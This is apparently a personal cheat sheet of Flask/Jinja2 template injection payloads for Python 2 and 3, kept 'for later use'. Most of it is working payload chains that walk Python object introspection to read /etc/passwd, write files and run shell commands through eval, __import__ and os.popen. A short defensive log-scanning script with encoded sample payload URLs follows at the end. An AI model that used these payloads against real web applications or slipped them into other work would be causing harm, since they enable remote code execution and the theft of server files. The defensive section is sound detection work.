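Flask template injection payloads: Python 2 and Python 3
I am recording template injection payloads here for later use.
They fall into two main groups: Python 2 and Python 3.
There are also various filters and bypasses.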
Python 2
File operations
Find the file class:
[].__class__.__bases__[0].__subclasses__()[40]
payload:
# read a file
[].__class__.__bases__[0].__subclasses__()[40]('/etc/passwd').read()
# write a file
[].__class__.__bases__[0].__subclasses__()[40]('/tmp').write('test')
Command execution
Execution via os
[].__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.linecache contains the os module, so commands can be executed directly.
payload:
[].__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.linecache.os.popen('id').read()
Global functions such as eval and __import__
[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__ contains global functions such as eval and __import__, which can be used to execute commands.
payload:
[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('id').read()")
[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__.eval("__import__('os').popen('id').read()")
[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__.__import__('os').popen('id').read()
[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['__builtins__']['__import__']('os').popen('id').read()
Python 3
File operations
payload:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('filename', 'r').read() }}{% endif %}{% endfor %}
Command execution
payload:
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('id').read()") }}{% endif %}{% endfor %}
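All of the Python 2 and Python 3 payloads above walk the same chain of introspection attributes, which makes them recognisable in request logs. The following is an added example, not part of the original notes: a query-parameter check for that chain, where the function names, the two-indicator threshold and the sample URLs are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Introspection names chained by the payloads on this page.
INDICATORS = frozenset({
    "__class__", "__base__", "__bases__", "__subclasses__", "__init__",
    "__globals__", "func_globals", "__builtins__", "__import__",
})
TOKEN = re.compile(r"(?<!\w)(__[a-z]+__|func_globals)(?!\w)")
DELIM = re.compile(r"\{\{|\{%")  # Jinja2 expression / statement openers

def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is judged in one form."""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value

def inspect(value):
    """Classify one parameter value as 'alert', 'review' or 'ok'."""
    text = decode(value)
    hits = sorted(set(TOKEN.findall(text)) & INDICATORS)
    if len(hits) >= 2:              # a chain of introspection attributes
        return "alert", hits
    if hits or DELIM.search(text):  # lone indicator or template syntax
        return "review", hits
    return "ok", hits

def scan_request(url):
    """Return {param: (verdict, hits)} for each query parameter that is not 'ok'."""
    findings = {}
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        verdict, hits = inspect(value)
        if verdict != "ok":
            findings[name] = (verdict, hits)
    return findings

# Constructed sample request lines (not real traffic).
SAMPLES = [
    "/hello?name=alice",
    "/hello?name=%7B%7B%5B%5D.__class__.__bases__%5B0%5D.__subclasses__()%7D%7D",
    "/hello?name=%257B%257Bx.__init__.__globals__%257D%257D",
    "/search?q=python+__init__+method",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(url, "->", scan_request(url) or "ok")
```

This is a triage signal for logs, not the fix: the fix is to pass user input to templates only as context variables and never as template source.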